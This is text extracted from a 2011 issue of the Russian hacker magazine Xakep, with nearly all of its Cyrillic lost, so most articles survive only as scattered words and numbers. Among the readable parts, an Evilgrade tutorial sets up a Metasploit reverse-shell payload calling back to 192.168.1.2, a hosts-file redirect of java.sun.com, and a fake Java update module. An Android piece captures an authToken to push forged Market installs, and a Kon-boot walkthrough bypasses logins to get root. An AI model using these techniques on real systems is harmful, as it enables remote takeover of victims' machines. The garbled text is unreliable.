Вы находитесь на странице: 1из 148

.

210
:

x 07 (150) 2011

07 (150) 2011

[1-150]. C 1999

[1-150]

150

c 1999




:
18-25

XSS Heap overflow
SQL-
, null-byte gigabyte
Black Hat

5

nikitoz@real.xakep.ru
VZLOM

INTRO

150 , 1999 .
, dial-up, ,
DALnet, Pentium MMX Windows 98
. BBS ,
. : 80 85 2-3 ,
10 , , . -
- 10 ,
- .
, ip , . ,

, , 1999
,
.

, 12.5 , ,
. ,
: ,
.
, : , , IT .
,
12.5 : , ,
, , , , , , ,
, , , , ,
M.J.Ash, , , , , NSD,
, , , ,
, , , . !
nikitozz,

Content
MegaNews

004

Ferrum
016

022

SSD-
WEXLER.BOOK T7002

PC_Zone
024
028
033
034
038

Android-

084

088

!
Must have

094

098

102
106
110

Proof-of-Concept

040
044
050
054
060
062
066

Easy-Hack


-. Opera

0day

MALWARE
068

?
,

072

...

, , !
EXE- Python'

076

Positive Hack Days 2011


080


, ? !

Mac OS X

,
: TDD Android

SYN/ACK
114
118

Cisco

LAMP

124

(L)AMP FreeBSD

PHREAKING
130

Kinect:

Music Maker 16

X-Tools

SCADA

Facebook


Dropbox, VK, Flikr

Android: ?

7 - 2011

KDE4 GNOME3

136

140
143
144

FAQ UNITED
FAQ

8.5

WWW2

web-

024

Android-

Android: ?

LibreOffice

094

Mageia

Linux Mint

136

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)

/ART

>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906

> TECHNOLOGY
(komleva@glc.ru)

>PR-
(grigorieva@glc.ru)

>
(olgaeml@glc.ru)
(alekhina@glc.ru)

> xakep.ru
(xa@real.xakep.ru)

>
(polikarpova@glc.ru)

>
(maligina@glc.ru)
>
( )
(strekneva@glc.ru)
>



>

> -
(alekseeva@glc.ru)
> MAN TV

>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .

>

>


.

. ,
,
.


.
.


:
content@glc.ru

, , 2011

>
(kosheleva@glc.ru)
>
(lukicheva@glc.ru)
> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

: 8-800-200-3-999

MEGANEWS
Mifrill (mifrill@real.xakep.ru)

Meganews

GOOGLE

Google
,
.
, , .
Google Wallet Citigroup, MasterCard, First Data
Sprint.

,
,
(, BlingTag). NFC (Near Field
Communication).
, Google NFC-. Google Wallet
Android, Google ,
,
.
Google Wallet,
,
. Google eBay PayPal,
.
, Google
eBay . eBay
,

... Google. 2011


, , -
Google, -

,
PayPal. eBay ,

. ,
Google Wallet -
. , eBay PayPal
.
Google -
( ).
20
000 ,
.
Android. ,
,
.

, Rustock,
. Microsoft ,
: , 427 000 email-.


, -
. ( )
, , ,
. ,
, ,
. ,
. The
Guardian :
,
( ).
, 12
, !
300
World of Warcraft. ,
5000-6000 , $900. ,
,

004

.
. , ,
, . :
, XXI .
X 07 /150/ 2011

MEGANEWS

+70%
Apple . iMac,
iPad, iPhone .
:
21,5", Intel Core i5 2,5 , AMD 6750M GDDR5 512 ,
500 , $1199;
21.5", i5 2,7 , AMD 6770M 512 , 1 , $1499;
27", i5 2,7 , AMD 6770M 512 , 1 , $1699;
27", i5 3,1 , AMD 6970M 1 , 1 , $1999.
,
Intel Core i5, Core i7 3,4 ,
2 , SSD- 256
, 8 . iMac,
, /
Thunderbolt ( 21,5-
27-).
FaceTime HD
. : iMac
- ,

IPS-, FireWire 800, 4 USB 2.0, SDXC, SuperDrive (DVD-RW), Gigabit


Ethernet Wi-Fi (802.11n 2,4/5 Bluetooth 2.1+EDR). .

Seagate
3,5 , 1 .
625 /
..

30

, , , . 22- -

, 30
. , IT-
,
.
( 4chan Zoklet) ,
. ,
. ,

. - ,
,
Sony PlayStation. , ,
, Tor, , ,
IP. , ,
.

Dropbox ,
300 . 5 !
Dropbox 100 .
006

X 07 /150/ 2011

MEGANEWS


EDIFIER
Edifier , MP15
MP3-, .
, ( USB-), 6 .
, .
: 200x60x33 ,
200 . MP15 SD- . - 21,5" (40) . MP3-
,
.

Symantec . ,
, 70%
, 68%
, 56%
,
.



,
HP

,
Wi-Fi. Wi-Fi Mobile Mouse ,
HP,
,
Wi-Fi (
Link-5).

, , ,
. Wi-Fi Mobile Mouse -

,
USB- .
10 ,
9 . , ?
. HP, ,
: HP Wi-Fi Mobile Mouse
. , ,
1600
(CPI).
$50.



, . , . -
. . : 7 , 0,6 , CO 8 .
25 .

008

X 07

MEGANEWS

, . . ,
, , -

, , , . ...
. , . .
, , ,
.
Massive Multiplayer Online War Game
Leveraging the Internet (MMOWGLI),
mmowgli.nps.edu. , , ,
, , . MMOWGLI .
-, ,
, . , , ,
.
, , ,
.
, .
, , ,
.
.


, 2010
3 .

,
60-
,

.

:
, . ,
, , ,
. ,
, (
),
.
,
! ,

,
.
, .
, ,
,
(
) . , ,
, . ,
, ,
24-
.



Samsung .
, . Samsung
, .
, ,

010

, , : NC215S.
. ,
,
,
(

).
,
,

, , ,
.
X 07 /150/ 2011

MEGANEWS

, ,

,
.
Facebook,
: Facebook Google .
PR- Burson-Masteller,
WPP,
,
Microsoft. ,
, :
Google,
,
(
).
Facebook ,
Burson-Masteller


Google.
, ,
,
computerworld.
com. , ,
, ,
Facebook ( ). Burson-Masteller ,

,
. BursonMasteller .
Google ,
, , Facebook
.

, Google, ,
20% Microsoft Windows.
, Chrome OS.

ZEUS ,


, ZeuS SpyEye,

, .

. : ZeuS
, ,
. -

,
, .
, (
$10 000, )
. ,

,
,

-. ,
. ,


. ,
, stand-alone-
. , :
wasm.ru :).

()


.

, .

,
US Copyright Group, . US
Copyright Group ,
, 23 000
. -

012

.
6500 ,
, , 23
322 IP-, , ,
. -
, .
, ,
. ,
,
.

$150 000. , ,
,
$3000.
X 07 /150/ 2011



, ,

,
( ,
- ).
() -
(NUST)


.
.
, : -


, . :
, 1 , , 0.
, . ,
. ,
, . ,
, 160
20 . ,
.
.
, , FAT32,
4 .
sciencedirect.com/science/article/pii/S016740481000088X, , , .

- VESTEL
Connected TV Vestel, c 55
, . ( ) -,
, , , , , , .

3D ( , , ),
3D-. 3D-
, 3D
. , 2D 3D. ,
.
,
3D 3D-.

WWDC 2011 ,
54 Mac, 3/4
MacBook.



NASDAQ. IPO (Initial Public
Offering

)

.
YNDX.
IPO
- X 07 /150/ 2011

. , 2010 Mail.ru Group


16,8% .
NASDAQ 24 18:30
, 1 . :
IPO 8,03 .

$25 . $35
. , 11,2
.
LinkedIn, NASDAQ . !

013

MEGANEWS

MICROSOFT SKYPE

Microsoft
IP- Skype
$8,5 . , Skype

.
2005 , Skype
eBay $2,6 , , 2009
, Skype
$1,9
( ). Skype
170 , ,

.
Microsoft ? . IT- , , Skype

Xbox, Kinect Windows Phone


, Microsoft.
,
Microsoft Skype! . , stand-alone Lixux, Mac
OS . Skype
Microsoft .
Skype (Tony
Bates). ,
.




,

Apple (iPhone iPad
3G-)

Android. ,

,
.
, Apple

, ,
,
, . . -, Apple Google
,
. ,

Wi-Fi. -, . , Apple ,
. ,
,
. ,
, ,

7-10
. Apple
, iOS 4.3.3.
,
, iTunes
.
, -, , Apple
Google
.
.
, , Google 50

.

SONY

, - Sony.
Sony
GeoHot , ,
.
,
( ,

014

Sony
), -
Geohot
. ,
PlayStation Network,
. Sony
, , ,
,
, , , . Sony .
.
. , ,

, .
? . -,
PlayStation Network.
,
,

. ,
email-, -

,

. , . -,
SQL-
Sony-Ericsson.
-, Sony BMG ,
Sony Music Japan. ,
!
( thehackernews.com).
, Sony
.
, , ,

, . , Sony
,
. ,


.
X 07 /150/ 2011


, Sony.
,
.
, . , Microsoft Windows Phone 7
.
7392, 3 , ,
. ,
, . Google,
. , Google ,
root-, .
: Failed to fetch license for [ ]
(error 49). , , ,
.

, ?
Netflix,
, Netflix -. ,
, Netflix, ,
.
:
2010 , 3,3 1,7 .
Netflix 22 800 000 ,
$706 2011 .
, 8 ,
, ,
, .
, ( )
. , . ,
iPhone, iPad, XBox, PlayStation 3 .
,
, , ,
, ... ,
,
, . .
X 07 /150/ 2011

015

FERRUM


SSD-
SSD
.

,
.
SSD ?
SSD HDD ,
, flash- ( ), . ,
, , USB-,
. , -
HDD .

, .
SSD.
, . -,
, flash-,
, RAID 0.
-. , , SSD
, ,
. ,

,
NAND-.


, SSD . ,
,
, NAND-
. , MLC-,
SSD, 10000
/, SLC-
. , ,
, SSD- .
,
SSD. .

, ,
. HDD,
. SSD
-, NAND-.
4 , 512
. SSD ,
HDD. 512 ,
, -

016

: Intel Core i7-975 Extreme, @ 3466


: ASUS P6X58D Premium
: NVIDIA GeForce GT 240
: Kingston 99U5471-002.A00LF

@1333 , 32

: Corsair CSSD-F120GB2, 120


: FSP EPSILON 80 PLUS, 900
: Windows 7 x32

, . ,
. , , , SSD .

TRIM, (Windows 7
Windows Server 2008), . ,
,
, . ,
SSD ,
.


SSD
,
. PCMark Vantage, , Windows
Windows Movie Maker.
IOmeter, ,
( 128 ), (
4 ). ( ) ,
- . , ATTO Disk Benchmark
/ 0,5 8192 .
SSD 100%
, .
.
, BIOS
ACHI.
X 07 /150/ 2011

3500 .

5900 .

Corsair
CSSD-F40GB2

Corsair
CSSD-F90GB2-BRKT

-: 2,5
: SATA II
: MLC
: SandForce SF-1200
: 280 /
: 270 /
: 1
: 40

-: 2,5
: SATA II
: MLC
: SandForce SF-1200
: 285 /
: 275 /
: 1
: 90

Corsair CSSD-F40GB2 SSD-


. ,
. , . ,
, .
, .
SandForce SF-1200,
40- . , ,
Corsair CSSD-F90GB2-BRKT. ,
HDD ,
, SSD Corsair
CSSD-F40GB2. ,
,
. 40 ,
Corsair CSSD-F40GB2 RAID 0, ,
.

Corsair CSSD-F90GB2-BRKT, ,
. 90
, ,
(, ). SSD .
, Corsair CSSD-F40GB2.
PCMark Vantage.
,
? , TRIM , ,
. ,
. Corsair CSSD-F90GB2-BRKT,
3,5- .
! , Corsair CSSD-F90GB2-BRKT
, , , ,
.

.
.
, - Program Files
.
3,5- .

X 07 /150/ 2011

.
:
.
.

017

FERRUM

4500 .

n/a

Kingston
SVP100ES2/64G

OCZ
OCZSSD2-2VTX60G

-: 2,5
: SATA II
: MLC
: Toshiba T6UG1XBG
: 230 /
: 180 /
: 1
: 64

-: 2,5
: SATA II
: MLC
: SandForce SF-1200
: 285 /
: 275 /
: 2
: 60

,
SSD. Kingston SVP100ES2/64G
TOSHIBA T6UG1XBG, 230 / 180 / . ,
, .
, Kingston SVP100ES2/64G
.
, ,
128- AES. Kingston,

. , , ,
.
, Kingston SSD
: ,
SATA, ,
2,5- HDD, Kingston SVP100ES2/64G,
USB 2.0.
Kingston , ,
.

OCZ OCZSSD2-2VTX60G
Vertex. Vertex .

230/135 /
( 64 ).
, . 60- Vertex 2,
OCZ OCZSSD2-2VTX60G, , 285 /
, . 275
/. ,
OCZ OCZSSD2-2VTX60G Corsair
CSSD-F90GB2-BRKT.
, OCZ SSD- Vertex.
SandForce SF-2200, 500
/ . ,
Vertex 2 (- ,
, 120 ),
, SSD .

.
SSD.
.

018

2 .
.
3,5- .

X 07 /150/ 2011

7100 .

4800 .

Silicon Power
SP128GBSSDE20S25

Transcend
TS64GSSD25S-M

-: 2,5
: SATA II
: MLC
: JMF616
: 250 /
: 230 /
: n/a
: 128

-: 2,5
: SATA II
: MLC
: JMicron JMF612
: 240 /
: 110 /
: 1 .
: 64

, 40, 60 64,
,
SSD. Silicon Power SP128GBSSDE20S25
128 NAND-,

. , .
- - . , Silicon Power SP128GBSSDE20S25
, ,
.
249,99 /, . , ,
, 202 / .
,
. , .
, , , Silicon Power SP128GBSSDE20S25
. 128 , .

Transcend
TS64GSSD25S-M. ,

7 9 / . Transcend TS64GSSD25S-M
. .
SSD Transcend TS64GSSD25S-M ,
.
, , ,
Transcend TS64GSSD25S-M ,
.
Transcend TS64GSSD25S-M . ,

SSD- .
, ,
,
SATA II .

.
.
.

.
.

X 07 /150/ 2011

019

FERRUM


PCMark Vantage,

IOmeter random 4 , /

Corsair CSSD-F40GB2

Corsair CSSD-F40GB2

Corsair CSSD-F90GB2-BRKT

Corsair CSSD-F90GB2-BRKT

Kingston SVP100ES2/64G

Kingston SVP100ES2/64G

OCZ OCZSSD2-2VTX60G

OCZ OCZSSD2-2VTX60G
Silicon Power SP128GBSSDE20S25

Silicon Power SP128GBSSDE20S25


Transcend TS64GSSD25S-M

Read
Write

Transcend TS64GSSD25S-M
0 5000 10000 15000 20000 25000 30000 35000

Who is who PCMark Vantage

10

15

20

25

30

IOmeter Patterns, /

Database
Fileserver
Workstation
Webserver

IOmeter sequential 128 , /

Corsair CSSD-F40GB2

Corsair CSSD-F40GB2

Corsair CSSD-F90GB2-BRKT

Corsair CSSD-F90GB2-BRKT

Kingston SVP100ES2/64G

Kingston SVP100ES2/64G

OCZ OCZSSD2-2VTX60G
Silicon Power SP128GBSSDE20S25

OCZ OCZSSD2-2VTX60G
Silicon Power SP128GBSSDE20S25

Transcend TS64GSSD25S-M

Read
Write

Transcend TS64GSSD25S-M
0

10

20

30

40

50

60

70

-, ,

50

100

150

200

250

300

PCMark Vantage, /

Windows Defender
Gaming
Importing Pictures to Windows Photo Gallery
Windows Vista startup
Video editing Windows Movie Maker
Winndows Media Center
Adding music to Windows Media Player
Application loading

Corsair CSSD-F40GB2
Corsair CSSD-F90GB2-BRKT
Kingston SVP100ES2/64G
OCZ OCZSSD2-2VTX60G
Silicon Power SP128GBSSDE20S25
Transcend TS64GSSD25S-M
0,00

50,00

100,00

150,00

200,00

250,00

PCMark Vantage , SSD


, . .
, Corsair CSSDF40GB2.

020

. OCZ OCZSSD2-2VTX60G.
SSD CSSDF90GB2-BRKT , 2
, . z
X 07 /150/ 2011

FERRUM

WEXLER
BOOK T7002

: 7 , 800x480,
, LED-
: 4 + microSD (
16 )
: USB 2.0,

: ANSI, TXT,
PDF, HTML,
FB2, PDB, EPUB
: JPG,
JPEG, BMP, GIF
: WMV, RM, AVI,
RMVB, 3GP, FLV, MP4, MPEG,
MKV

: MP3, WMA,
FLAC, AAC
: ,

:
, , ,

: 190x120x6
: 300
: USB, ,
, , ,

2033
: 12

WEXLER.BOOK T7002 WEXLER,


, . ,
, .

WEXLER.BOOK T7002
. .
, ,
. MicroSD, 3,5- - , Mini USB.
, ,
, .
, . , . Play/
Pause, , . , , , .
.

, ,
...

LED- 800480 . . 4
, -
MicroSD.
WEXLER.BOOK T7002 : TXT, PDF,
FB2, EPUB . ,
, , JPG 31623162 .
: WMV,
AVI, MPEG MKV. ,
2 /. WEXLER.BOOK T7002
, MP3, WMA, FLAC AAC.

022

WAV (32/45 /). :


.

, .
, . : ,
, .
,
, .
, , .

Play/Pause.
, ,
.
, .
, , ,
Sokoban.
, .
. ,
. :
! , AV-,
.
. ?
,
WEXLER.BOOK T7002 . ,
, .
2033. z
X 07 (150) 2011

PC_ZONE

ANDROID-

Android: ?

Android , Google
.
,
?
. Android HTC Dream/
G1 2008 .

Motorola Droid 2009 .
, ,
. Google I/O
: 400 000
! : , , . 100
Android. . ,
Google , . ,
.
, Google
GTalkService. ,

024

-
, . ,
GTalkService.
?
? ? ,
- ?

GTalkService

Android TCP/SSL/
XMPP- GTalk. ,
.
GTalkSerive. (
heartbeat-) Google,
X 07 /150/ 2011

HTTP://WWW
links

(jon.oberheide.
org).

Google
,
. Google .
GTalkService
.
C2DM (Cloud to Device Messaging Framework),
,
, ( ,
). , C2DM
, . , Android
: REMOVE_ASSET INSTALL_ASSET,
Google .
, Android Market , REMOVE_ASSET
GTalkService,
. , ,
. .
Google INSTALL_ASSET, Android APK- . :
Google .
, . - MITM SSL- GTalkService
INSTALL_ASSET,
- ? ?


Google, Android-.
.
, -

GTalk Service Monitor


. , GTalkService, ,
: SSL. ,

. - (
SSL 125 ][). SSL , , Google.
INSTALL_ASSET,
. . ,
- , ,
? Google , . ,
,
GTalkService INSTALL_ASSET. ?
. , ,
,
Android Market. Install , GTalkService INSTALL_ASSET,

APK- . ,

Android

Andoid Market

INSTALL_ASSET

5
GTalk Service

Android Market

Google

C2DM

APK-

APK-
X 07 /150/ 2011

025

PC_ZONE

POST- Android Market


:
INSTALL_ASSET . -, ( , SSL-)
:
1. Android-, Android Market.
2. CA- /system/etc/security/
cacerts.bk, keytool portecle.
3. MITM-, sslsnif (www.thoughtcrime.org)
CA-.
, GTalkService ,
, CA, .
- Android Market , ,
, INSTALL_ASSET.
:
tickle_id: 1277687266074
assetid: -155863831473120556
asset_name: Replica Island
asset_type: GAME
asset_package: com.replica.replicaisland
asset_blob_url: http://android.clients.
google.com/market/download/Download?assetId=
-155863831473120556&userId=986032118775&
deviceId=1094117203906638597
asset_signature: Ayn2bWDqckQkKsBY4JurvCFpYN0
asset_size: 5144485

,
Android Market. asset_signature. ,
INSTALL_ASSET,
. , . ,
, base64 APK- (..
),
Android Market. ,
APK-
. ,
INSTALL_ASSET (,
, ) . SSL- GTalkService,
,
, ! , ,
. ,
, ,
MITM-.
- .
, , ,
. ,
, Android
GTalkService.

026

protobuf

Android Market

, GTalkService Android Market. .


. , :
1. Android Market.
2. .
3. Install.
4. .
5. .
. , ,
. Android Market, ( )
,
GTalkService. (. ) :
1. Android
Market.
2. POST- Android Market.
3. Android Market
C2DM.
4. C2DM
INSTALL_ASSET GTalkService.
5. GTalkService INSTALL_ASSET
Vending-.
6. Vending- APK- ,
, .
, , , POST-,
. Android
Market, , , ? .
:
POST /market/api/ApiRequest HTTP/1.1
Content-Length: 524
Content-Type: application/x-www-form-urlencoded
Host: android.clients.google.com
Connection: Keep-Alive
User-Agent: Android-Market/2 (dream DRC83); gzip
version=2&request=CuACCvYBRFFBQUFLOEFBQUJvZWVEVGo4eGV4OVR
JaW9 . . .

, request,
. Google, ,
, protobuf (code.
google.com/p/protobuf) base64.
. ,
:
X 07 /150/ 2011

authToken , .
, , , - .
! Account Manager Android,
. , -
Twitter ,
Twitter-
AcountManager, .
authToken,
Android Market.
,
:

1{
1: "DQAAAK8AAABoeeDTj8xex9TIio . . ."
2: 0
[... ...]
13: "-606db3000d480d63"
}
2{
10 {
1: "353999319718585473"
}
}

-, : ,
. ,
, , , , Market
. , protobuf,
Android Market, ,
.
code.google.com/p/android-market-api
API,
(, ..). ,
.
Android-
, ,
. , :
[.. ..]
message InstallRequest {
optional string appId = 1;
}
message RequestContext {
required string authToken = 1;
[.. ..]
required string androidId = 4;
optional string deviceAndSdkVersion = 5;
[.. ..]


(, , ..).
appId authToken:
appId
Android Market. ,
Android Market , protobuf .
authToken ClientLogin,
Android Market
.
X 07 /150/ 2011

AccountManager accountManager =
AccountManager.get(getApplicationContext());
Account acct = getAccount(accountManager);
accountManager.getAuthToken(acct, "android",
false, new GetAuthTokenCallback(), null);

? , , protobuf-, ,
POST- Android Market.
( , ),
GTalkService , ,
INSTALL_ASSET,
! ,
( ),
. !

,
Android Market,
, . .
, ,
.

Android Market (
), ! . PoC- Angry Birds Bonus
Levels, Android
Market. :
.
,
:
,
-.
,
. ,
PoC Google,
.
, , . ,
Android Market, , INSTALL_ASSET .
Vending- INSTALL_ASSET
, , . , . ! , (
),
. z

027

PC_ZONE
(ale ks.raiden@gmail.com)

7
- 2011


- . .
, , .
.
1. SQL

- .
.
SQL , , noSQL,
-. ,
,
, :
?. -
,
, .
-

028

. SQL-, , .

. ,
, JSON
messagePak, Google ProtoBuf Apache Thrift. MongoDB
, JSON . Redis
key-value-, , , . noSQL-
get (
), set ( ), delete (
), update ( ).
X 07 /150/ 2011

HTTP://WWW
links




,
.
Apache Nuvem (incubator.apache.org/nuvem)
cloud-, Amazon EC2, Microsoft Azure
Google AppEngine. , .
Deltacloud (incubator.apache.org/deltacloud) Ruby,
( ) cloud. REST-, .
libcloud (libcloud.apache.org)
Java Python,
.
Simplecloud (simplecloudapi.org) ,
Zend_Cloud,
, cloud - Zend Framework
.

- - (DHT).
noSQL ,
. DHT ,
, . ,
. ,
! ,
,
, . , ,
.
,
,
noSQL-
. 100 ,
.
. Facebook noSQL- Cassandra Twitter,
Cassandra HBase.
X 07 /150/ 2011

API
,
,

Node.JS:
nodejs.org;
PHPFog :
www.phpfog.com;
Erlang:
www.erlang.org;
Scala:
www.scala-lang.org;
Akka:
akka.io;
WebSokets
websocket.org;
Cloud9:
cloud9ide.com;
PhoneGap:
www.phonegap.com.

2. JavaScript

029

PC_ZONE

PHPFog
-
. JavaScript. :
, -
JS-. (.. )
, .
! :
JS : , ?
, :
. .
.
, , PHP-,
: ,
. :
, . JavaScript
, ,
, .
. ,
( callback
). ,
, .
Node.JS (
139 ][). V8,
JavaScript, Google Chrome . .
Node.JS .
HTTP- ( , 10
) . ,
Nginx-, Node.JS .

3.

, , JavaScript.
Python Twisted Tornado,
Ruby EventMachine, PHP phpDeamon
fastcgi, Java Netty.
,
. , Erlang,
Ericsson. , ,
Erlang ,

. ,

030

Github .
!
. : ,
,
. .
Scala. ,
- . , Twitter,
, Ruby-
Scala! - . Scala
Akka, , , ,
. ( ,
,
).
, .

4.

-, -
, . ,
, ,
. , (
Comet),
-. ,
HTTP ,
. ,
Flash , ?
HTTP : ,
- .
, .
: -
. HTML5 (
)
WebSockets, , .
- ?
, (
) .
. ,
X 07 /150/ 2011

, memcached,
.

-. !

NodeJS
. . , .
, .
: !
Nginx, 1.0.3, ,
. -
, ,
( ,
), . -
JavaScript . Node.JS
.
,
(
).

5.

,
, , , IT- . ,
cloud-
. Dropbox.
,
Amazon S3. .
.
.
. .
X 07 /150/ 2011

-
,
. 16
. ,
. , ,
Amazon ( , ), EC2. ,

. (Platform as a Service PaaS) ,
. .
,
. , PHP, Ruby
Rails, Python Node.JS,
MySQL, , NoSQL MongoDB, Redis Riak.
memcached, FTP

Git. -,
: memcached,
.
, . git clone
&& git push
, , .
API,

031

PC_ZONE

!

.
. - ,
GitHub . Git
. - , :
, .
,
, .
(-), ,
. Github
, - ,
-. .
: ( Opensource) Github , , , . , , Github
,
. ,
.
,
. , Cloud9 (c9.io), GitHub ,
.

jQuery
, , .
cloud- : AppEngine,
PHPFog, Azure, RackCloud.

6.

Git. , , FTP SVN


.
Git. ,
? Git-,
, ,
, Git.
: ,
. . Github (github.com), , ,
Git- -
. , ,
. ,

032

7.

. . ,
.
.
, JS-
( API ),
. jQuery Mobile
( alpha-),
,
, Blackberry, Windows Phone, webOS,
bada . , ,
jQuery, API . ,
,
.
,
- ,
. z
X 07 /150/ 2011

PC_ZONE
Step twitter.com/stepah

,
. ? ,
/CD .
.
Kon-boot,
CD
,

Windows (
) root
Linux-. (,

). ,
- ,
CD (, , )
- .
CD- (
Linux-),
.
, ?
.
1.
UNetbootin (unetbootin.
sourceforge.net) , .
2.
Kon-boot. ,
CD- ( ),
!
, .
,
. (www.piotrbania.com/all/kon-boot) Floppy image.
3.
UNetbootin,
Floppy.
4. ,
UNetbootin. <Enter>,
krypto logic.
:).
syslinx.cfg (bit.ly/mqKZ8R).
X 07 /150/ 2011

, . ,
syslinux, 1st Kon-Boot,
2nd try boot from drive
C: as hd1. krypto logic
,
.. hd2 .. ,
.
5. krypto logic
,
. , :
Linux
kon-usr:

KonBoot
2

Ubuntu 8.04 torpeda tty1


torpeda login: kon-usr
# id
uid=0(root) gid=0(root)
# whoami
root

Windows
,
.
Kon-Boot
,
Linux
root.
Ubuntu,
Linux.
Kon-Boot Windows-. ,
(TASM 4.0) X86-32.
Kon-Boot , www.kryptoslogic.com
,

Kon-Boot
3

,
32/64-
Windows-. z

033

PC_ZONE
ant


. :

. !
,
, .
, - . -
: . , ,
.
, Skype Java? .
, , ,
- . ,

. - ,
.

034

.
,
.
:
(
);
DNS (,
update.app1.com);
DNS- (, 192.168.1.1);
(, lastupdate.xml),
X 07 /150/ 2011

sunjava

Evilgrade + Metasploit
Evilgrade
, ;
,
http://update.app1.com/update.exe .
. ,
,
.
- . ,

, . MITM-, , ARP-
DNS-. ,
, . Infobyte Security
Research (www.infobytesec.com/developments.html)
Perl
. Evilgrade
:
Teamviewer 5.1.9385;
Notepad++ 5.8.2;
Java 1.6.0_22 winxp/win7;
Appleupdate <= 2.1.1.116 ( Safari 5.0.2
7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8
1675);
Windows update (ie6 lastversion, ie7
7.0.5730.13, ie8 8.0.60001.18702, Microsoft works);
Winamp 5.581;
VirtualBox (3.2.8 );
Filezilla;
Flashget;
Miranda;
Skype;
Trillian <= 5.0.0.26;
Adium 1.3.10 (Sparkle Framework);
VMware;
..

. Evilgrade
, Web- DNS-,
X 07 /150/ 2011

Evilgrade agent, (payload). , ,


. ,
agent, , Evilgrade
(, , agent). ,
Evilgrade
payload Metasploit. :
> set agent '["/metasploit/msfpayload windows/shell_reverse_tcp
LHOST=192.168.1.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'

, windows/shell_
reverse_tcp, 4141
192.168.1.2. <%OUT%> ,
( /tmp,
a.exe). , , :
Metasploit, ,
Evilgrade.
.

.

Blackhat Arsenal & Defcon 2010.

Evilgrade

Perl,
. ,
Active Perl (www.activestate.
com/activeperl)
: IO::Socket::SSL Net::SSLeay.
,
ppm
. :

WARNING
warning
.



.

ppm install http://www.sisyphusion.tk/ppm/NetSSLeay.ppd


ppm install http://www.sisyphusion.tk/ppm/IOSocket-SSL.ppd

Evilgrade
. Metasploit,
Evilgrade : -

035

PC_ZONE


, . help, :
configure < >
;
reload ;
restart Web- DNS-;
set ;
show .
:
options ;
vhosts ;
modules ;
active ;
start Web- DNS-;
status Web-;
stop Web- DNS-;

, .
. . ,
, ,
. , , Java,
,
. , .

, : ,
Java, , (c Evilgrade)
. ,
, , ,
ARP-spoofing DNS Cache Poison.
(
) hosts ,

:
192.168.1.2
192.168.1.2

java.sun.com
javadl-esd.sun.com

Evilgrade. :

, :
> show options

:
Name = Sun Microsystems Java
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = ""
VirtualHost = "(java.sun.com|javadl-esd.sun.com)"
.-------------------------------------------------------| Name
| Default
| website | http://java.com/moreinfolink
| enable | 1
| atitle | Critical vulnerability
| arg
| http://java.sun.com/x.jnlp"
| adesc
| This critical update fix internal vulnerability
| descr
| This critical update fix internal vulnerability
| agent
| ./include/sunjava/JavaPayload/FunnyClass2.jar
| title
| ritical update
-------------+------------------------------------------

agent,
(payload) Metasploit. ,
,
. FunnyClass2.jar. reverseshell,
2010 .
, 2010 .
include\sunjava\JavaPayload\ :
java -cp "JavaPayload.jar:lib/*" javapayload.handler.
stager.StagerHandler ReverseSSL 192.168.1.2 2010 -- JSh

.
atitle adescription. ,
, Java
,
. ,
set. , , :

perl evilgrade

, show
modules. , ,
sunjava. , ,
:
> conf sunjava

036

> set atitle "New version available"

.
show options, . ,
.
start.
X 07 /150/ 2011

Evilgrade
, Evilgrade -
.
,
. .
, ,
. Evilgrade
Perl, , ,
Perl-, :
1. :
package modules::sunjava;
use strict;
use Data::Dump qw(dump);

2. $base, :
, ,
, , ,

:
'name' => 'Sun Microsystems Java',
'version' => '2.0',
'appver' => '<= 1.6.0_22',
'author' => [ 'Name Surname < mail +[AT]+ mail.com>' ],
'description' => qq{},
'vh' => '(java.sun.com|javadl-esd.sun.com)',

,
:
'req' => '(/update/[.\d]+/map\-[.\d]+.xml|/
update/1.6.0/map\-m\-1.6.0.xml)',

, . , , Java,
Update, Update Now.
Evilgrade.
show status:
client = 192.168.1.1
module = modules::sunjava
status = send
(md5,cmd,file) = d9a28baa883ecf51e41fc626e1d4eed5,'',
".include/sunjava/JavaPayload/FunnyClass2.jar"

, 192.168.1.1. , ,
, ,
reverse shell . help , .

,
. ,
X 07 /150/ 2011

,
:
'options' =>
{ 'agent' =>

{ 'val' => './agent/java/javaws.exe',


'desc' => 'Agent to inject'},
'arg'
=> { 'val' => 'http://java.sun.com/x.jnlp',
'desc' => 'Arg passed to Agent'},
'enable' => { 'val' => 1, 'desc' => 'Status'},

DVD-.

, - . , .
, . ( , ,
), Evilgrade, ,
.
? Evilgrade ,
https
,
,
.
, - . z

037

PC_ZONE

PROOF-OF-CONCEPT
Proof-of-Concept (POC) ,
, .
-
poc@real.xakep.ru.

, tiniurl
C1jb2xvcjogIzAwMDsKfQo8L3N0eWxlPgo8L2hlYWQ+Cjxib
2R5PgpUaGlzIHBhZ2UgaXMgaG9zdGVkIG9uIDxhIGhyZWY9I
mh0dHA6Ly90aW55dXJsLmNvbSI+dGlueXVybC5jb208L2E+C
jwvYm9keT4=

'#' base64, ,
:
var hsh = document.location.hash;
hsh = hsh .substring(1, hsh .length);
document.write(decode64(hsh ));
// decode64 , base64

, '#', .
RFC URL ,
base64 html- , , . ,
data. , :

HTTP://WWW
links



:
malaya-zemlya.
livejournal.
com/639054.html

038



malaya-zemlya.livejournal.com.
URL,

URL' bit.ly, goo.gl tinyurl.com.
- ,

. .
. , .
, .
, , , tinyurl.com/3nghu2l.

:
http:///.html#PGhlYWQ+CjxzdHls
Z4KYm9keSB7CiAgY29sb3I6ICNGRjY7CiAgYmFja2dyb3VuZ

<img src="data:image/gif;base64,R0lGODlhEAAOAL
MAAOazToeHh0tLS/7LZv/0jvb29t/f3//Ub//ge8WSLf/
rhf/3kdbW1mxsbP//mf///yH5BAAAAAAALAAAAAAQAA4AAA
